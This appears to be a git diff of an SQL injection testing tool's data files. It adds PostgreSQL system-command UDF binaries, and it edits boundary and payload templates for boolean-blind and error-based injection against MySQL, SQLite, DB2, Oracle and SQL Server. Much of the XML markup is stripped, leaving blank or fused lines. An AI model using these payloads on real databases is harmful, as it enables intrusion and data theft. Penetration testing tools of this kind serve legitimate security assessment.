diff --git a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..ff31df61499
Binary files /dev/null and b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..d5576fdd8cf
Binary files /dev/null and b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..2350427f4ac
Binary files /dev/null and b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..eae84bdadd0
Binary files /dev/null and b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
new file mode 100644
index 00000000000..4a408a1ae0c
Binary files /dev/null and b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
new file mode 100644
index 00000000000..40f838b30f5
Binary files /dev/null and b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
new file mode 100644
index 00000000000..a9b4b48c7b7
Binary files /dev/null and b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
new file mode 100644
index 00000000000..06aee54d778
Binary files /dev/null and b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
new file mode 100644
index 00000000000..67b5d34976f
Binary files /dev/null and b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ
diff --git a/xml/banner/generic.xml b/data/xml/banner/generic.xml
similarity index 76%
rename from xml/banner/generic.xml
rename to data/xml/banner/generic.xml
index eb97b1d8810..fc2fb97f59a 100644
--- a/xml/banner/generic.xml
+++ b/data/xml/banner/generic.xml
@@ -27,49 +27,53 @@
+
+
+
+
-
-
+
+
-
+
-
+
-
+
-
+
-
+
-
+
-
+
-
+
-
+
-
+
@@ -79,6 +83,10 @@
+
+
+
+
@@ -111,10 +119,22 @@
+
+
+
+
+
+
+
+
+
+
+
+
@@ -131,7 +151,7 @@
-
+
diff --git a/xml/banner/mssql.xml b/data/xml/banner/mssql.xml
similarity index 100%
rename from xml/banner/mssql.xml
rename to data/xml/banner/mssql.xml
diff --git a/data/xml/banner/mysql.xml b/data/xml/banner/mysql.xml
new file mode 100644
index 00000000000..456c9510b82
--- /dev/null
+++ b/data/xml/banner/mysql.xml
@@ -0,0 +1,79 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/xml/banner/oracle.xml b/data/xml/banner/oracle.xml
similarity index 100%
rename from xml/banner/oracle.xml
rename to data/xml/banner/oracle.xml
diff --git a/data/xml/banner/postgresql.xml b/data/xml/banner/postgresql.xml
new file mode 100644
index 00000000000..7f03e8e8c4a
--- /dev/null
+++ b/data/xml/banner/postgresql.xml
@@ -0,0 +1,16 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/xml/banner/server.xml b/data/xml/banner/server.xml
similarity index 79%
rename from xml/banner/server.xml
rename to data/xml/banner/server.xml
index 48f0ab15888..4d99cade0bd 100644
--- a/xml/banner/server.xml
+++ b/data/xml/banner/server.xml
@@ -3,14 +3,14 @@
-
+
@@ -74,19 +74,31 @@
-
+
-
+
-
+
-
+
+
+
+
+
+
+
+
+
+
+
+
+
@@ -127,36 +139,36 @@
-
-
-
-
-
-
-
-
-
+
-
+
-
+
-
+
-
+
-
-
+
+
+
+
+
+
+
+
+
+
@@ -273,6 +285,51 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
@@ -379,6 +436,26 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
@@ -559,6 +636,10 @@
+
+
+
+
@@ -678,6 +759,22 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
@@ -753,12 +850,94 @@
-
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
-
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/xml/banner/servlet.xml b/data/xml/banner/servlet-engine.xml
similarity index 71%
rename from xml/banner/servlet.xml
rename to data/xml/banner/servlet-engine.xml
index 403f143592c..c34d9617e1b 100644
--- a/xml/banner/servlet.xml
+++ b/data/xml/banner/servlet-engine.xml
@@ -7,6 +7,14 @@
+
+
+
+
+
+
+
+
diff --git a/data/xml/banner/set-cookie.xml b/data/xml/banner/set-cookie.xml
new file mode 100644
index 00000000000..419a436445a
--- /dev/null
+++ b/data/xml/banner/set-cookie.xml
@@ -0,0 +1,93 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/xml/banner/sharepoint.xml b/data/xml/banner/sharepoint.xml
similarity index 100%
rename from xml/banner/sharepoint.xml
rename to data/xml/banner/sharepoint.xml
diff --git a/xml/banner/x-aspnet-version.xml b/data/xml/banner/x-aspnet-version.xml
similarity index 100%
rename from xml/banner/x-aspnet-version.xml
rename to data/xml/banner/x-aspnet-version.xml
diff --git a/data/xml/banner/x-powered-by.xml b/data/xml/banner/x-powered-by.xml
new file mode 100644
index 00000000000..34ad03d18c2
--- /dev/null
+++ b/data/xml/banner/x-powered-by.xml
@@ -0,0 +1,65 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/xml/boundaries.xml b/data/xml/boundaries.xml
similarity index 88%
rename from xml/boundaries.xml
rename to data/xml/boundaries.xml
index b4fa0b71072..20bf0d10315 100644
--- a/xml/boundaries.xml
+++ b/data/xml/boundaries.xml
@@ -54,6 +54,7 @@ Tag:
3: LIKE single quoted string
4: Double quoted string
5: LIKE double quoted string
+ 6: Identifier (e.g. column name)
Sub-tag:
A string to prepend to the payload.
@@ -212,6 +213,15 @@ Formats:
AND ((('[RANDSTR]' LIKE '[RANDSTR]
+
+ 2
+ 1
+ 1,2
+ 3
+ %'
+ AND '[RANDSTR]%'='[RANDSTR]
+
+
21
@@ -293,94 +303,32 @@ Formats:
AND "[RANDSTR]" LIKE "[RANDSTR]
-
- 2
- 1
- 1,2
- 2
- %')
- AND ('%'='
-
-
-
- 3
- 1
- 1,2
- 2
- %'))
- AND (('%'='
-
-
-
- 4
- 1
- 1,2
- 2
- %')))
- AND ((('%'='
-
-
111,2
- 2
- %'
- AND '%'='
-
-
-
- 4
- 1
- 1,2
- 2
- %")
- AND ("%"="
-
-
-
- 5
- 1
- 1,2
- 2
- %"))
- AND (("%"="
-
-
-
- 5
- 1
- 1,2
- 2
- %")))
- AND ((("%"="
+ 1
+
+ [GENERIC_SQL_COMMENT]311,2
- 2
- %"
- AND "%"="
-
-
-
- 1
- 1
- 1,21
- [GENERIC_SQL_COMMENT]
+ # [RANDSTR]
+
311,2
- 1
-
- # [RANDSTR]
+ 2
+ '
+ OR '[RANDSTR1]'='[RANDSTR2]
@@ -444,7 +392,7 @@ Formats:
912
- '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
+ '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM])||'
@@ -453,7 +401,7 @@ Formats:
912
- '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
+ '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM])||'
@@ -461,8 +409,8 @@ Formats:
591
- 1
- '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ 2
+ '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM])+'
@@ -471,8 +419,35 @@ Formats:
912
- '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
- )+'
+ ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
+ )||
+
+
+
+ 5
+ 9
+ 1
+ 2
+ ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
+ )||
+
+
+
+ 5
+ 9
+ 1
+ 1
+ +(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ )+
+
+
+
+ 5
+ 9
+ 1
+ 2
+ +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
+ )+
@@ -550,6 +525,44 @@ Formats:
+
+
+ 4
+ 8
+ 1
+ 6
+ `=`[ORIGINAL]`
+ AND `[ORIGINAL]`=`[ORIGINAL]
+
+
+
+ 5
+ 8
+ 1
+ 6
+ "="[ORIGINAL]"
+ AND "[ORIGINAL]"="[ORIGINAL]
+
+
+
+ 5
+ 8
+ 1
+ 6
+ ]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]
+ )|[[ORIGINAL]
+
+
+
+
+ 5
+ 7
+ 1
+ 3
+ [RANDSTR1],
+ [RANDSTR2]
+
+
4
diff --git a/data/xml/errors.xml b/data/xml/errors.xml
new file mode 100644
index 00000000000..dda262765b9
--- /dev/null
+++ b/data/xml/errors.xml
@@ -0,0 +1,239 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/xml/payloads/boolean_blind.xml b/data/xml/payloads/boolean_blind.xml
similarity index 89%
rename from xml/payloads/boolean_blind.xml
rename to data/xml/payloads/boolean_blind.xml
index 114097cf79d..ae8b6de95f2 100644
--- a/xml/payloads/boolean_blind.xml
+++ b/data/xml/payloads/boolean_blind.xml
@@ -160,7 +160,7 @@ Tag: 111
- 1,9
+ 1,8,91AND [INFERENCE]
@@ -204,7 +204,41 @@ Tag:
- Codestin Search App
+ Codestin Search App
+ 1
+ 2
+ 1
+ 1,8,9
+ 1
+ AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
+
+ AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
+ [GENERIC_SQL_COMMENT]
+
+
+ AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
+
+
+
+
+ Codestin Search App
+ 1
+ 2
+ 3
+ 1,9
+ 2
+ OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
+
+ OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
+ [GENERIC_SQL_COMMENT]
+
+
+ OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
+
+
+
+
+ Codestin Search App121
@@ -221,7 +255,7 @@ Tag:
- Codestin Search App
+ Codestin Search App123
@@ -238,7 +272,7 @@ Tag:
- Codestin Search App
+ Codestin Search App143
@@ -295,7 +329,7 @@ Tag:
- Codestin Search App
+ Codestin Search App133
@@ -378,7 +412,7 @@ Tag: 131
- 1,2,3
+ 1,2,3,81AND MAKE_SET([INFERENCE],[RANDNUM])
@@ -416,7 +450,7 @@ Tag: 141
- 1,2,3
+ 1,2,3,81AND ELT([INFERENCE],[RANDNUM])
@@ -450,18 +484,18 @@ Tag:
- Codestin Search App
+ Codestin Search App151
- 1,2,3
+ 1,2,3,81
- AND ([INFERENCE])*[RANDNUM]
+ AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)
- AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]
+ AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)
- AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
+ AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)MySQL
@@ -469,18 +503,18 @@ Tag:
- Codestin Search App
+ Codestin Search App153
- 1,2,3
+ 1,2,3,82
- OR ([INFERENCE])*[RANDNUM]
+ OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)
- OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]
+ OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)
- OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
+ OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)MySQL
@@ -492,7 +526,7 @@ Tag: 121
- 1
+ 1,81AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
@@ -562,87 +596,62 @@ Tag: Oracle
-
-
-
-
- Codestin Search App
- 1
- 1
- 1
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
-
- MySQL
- >= 5.0
-
-
- Codestin Search App
+ Codestin Search App121
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
+ 1
+ 1
+ AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
+ AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
+ AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
- MySQL
- >= 5.0
+ SQLite
- Codestin Search App
+ Codestin Search App1
- 2
- 1
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
+ 3
+ 3
+ 1
+ 2
+ OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
+ OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
+ OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
- MySQL
- < 5.0
+ SQLite
+
+
+
- Codestin Search App
+ Codestin Search App1
- 3
+ 111,2,33
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
+ (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
-
- MySQL
- < 5.0
-
@@ -854,7 +863,6 @@ Tag: Microsoft SQL ServerSybase
- Windows
@@ -875,7 +883,6 @@ Tag: Microsoft SQL ServerSybase
- Windows
@@ -1011,7 +1018,7 @@ Tag:
- Codestin Search App
+ Codestin Search App131
@@ -1045,7 +1052,7 @@ Tag:
- Codestin Search App
+ Codestin Search App131
@@ -1223,7 +1230,6 @@ Tag: Microsoft SQL ServerSybase
- Windows
@@ -1244,7 +1250,6 @@ Tag: Microsoft SQL ServerSybase
- Windows
@@ -1361,6 +1366,61 @@ Tag: SAP MaxDB
+
+
+ Codestin Search App
+ 1
+ 4
+ 1
+ 3
+ 1
+ ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
+
+ ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
+
+
+ ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
+
+
+ IBM DB2
+
+
+
+
+ Codestin Search App
+ 1
+ 5
+ 1
+ 3
+ 1
+ ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
+
+ ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
+
+
+ ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
+
+
+ IBM DB2
+
+
+
+
+
+ Codestin Search App
+ 1
+ 3
+ 1
+ 1,2
+ 1
+ HAVING [INFERENCE]
+
+ HAVING [RANDNUM]=[RANDNUM]
+
+
+ HAVING [RANDNUM]=[RANDNUM1]
+
+
@@ -1369,7 +1429,7 @@ Tag: 141
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
@@ -1390,7 +1450,7 @@ Tag: 151
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
@@ -1411,7 +1471,7 @@ Tag: 131
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
@@ -1432,7 +1492,7 @@ Tag: 151
- 0
+ 1-81;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1
@@ -1452,7 +1512,7 @@ Tag: 131
- 0
+ 1-81;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
@@ -1465,7 +1525,6 @@ Tag: Microsoft SQL ServerSybase
- Windows
@@ -1474,7 +1533,7 @@ Tag: 141
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)
@@ -1487,7 +1546,6 @@ Tag: Microsoft SQL ServerSybase
- Windows
@@ -1496,7 +1554,7 @@ Tag: 141
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL
@@ -1516,7 +1574,7 @@ Tag: 151
- 0
+ 1-81;IIF([INFERENCE],1,1/0)
@@ -1536,7 +1594,7 @@ Tag: 151
- 0
+ 1-81;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END
diff --git a/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml
similarity index 80%
rename from xml/payloads/error_based.xml
rename to data/xml/payloads/error_based.xml
index b71971a5d5d..0d717f96170 100644
--- a/xml/payloads/error_based.xml
+++ b/data/xml/payloads/error_based.xml
@@ -7,7 +7,7 @@
241
- 1,2,3,9
+ 1,2,3,8,91AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
@@ -28,11 +28,11 @@
- Codestin Search App
+ Codestin Search App243
- 1,9
+ 1,8,91OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
@@ -56,7 +56,7 @@
241
- 1,2,3,9
+ 1,2,3,8,91AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))
@@ -72,11 +72,11 @@
- Codestin Search App
+ Codestin Search App243
- 1,9
+ 1,8,91OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))
@@ -91,12 +91,52 @@
+
+ Codestin Search App
+ 2
+ 4
+ 1
+ 1,2,3,8,9
+ 1
+ AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])
+
+ AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.6
+
+
+
+
+ Codestin Search App
+ 2
+ 4
+ 3
+ 1,8,9
+ 1
+ OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])
+
+ OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.6
+
+
+
Codestin Search App251
- 1,2,3,9
+ 1,2,3,8,91AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))
@@ -113,11 +153,11 @@
- Codestin Search App
+ Codestin Search App253
- 1,9
+ 1,8,91OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))
@@ -135,9 +175,9 @@
Codestin Search App2
- 1
+ 21
- 1,2,3,9
+ 1,2,3,8,91AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
@@ -159,9 +199,9 @@
Codestin Search App2
- 1
+ 23
- 1,2,3,9
+ 1,2,3,8,91OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
@@ -181,12 +221,32 @@
+
+ Codestin Search App
+ 2
+ 5
+ 1
+ 7
+ 1
+ (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+ (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.0
+
+
+
Codestin Search App2
- 2
+ 11
- 1,2,3,9
+ 1,2,3,8,91AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
@@ -208,9 +268,9 @@
Codestin Search App2
- 2
+ 13
- 1,2,3,9
+ 1,2,3,8,91OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
@@ -235,7 +295,7 @@
231
- 1,2,3,9
+ 1,2,3,8,91AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
@@ -259,7 +319,7 @@
233
- 1,2,3,9
+ 1,2,3,8,91OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
@@ -282,9 +342,9 @@
Codestin Search App2
- 2
+ 31
- 1,2,3,9
+ 1,2,3,8,91AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
@@ -305,11 +365,11 @@
- Codestin Search App
+ Codestin Search App2
- 2
+ 33
- 1,9
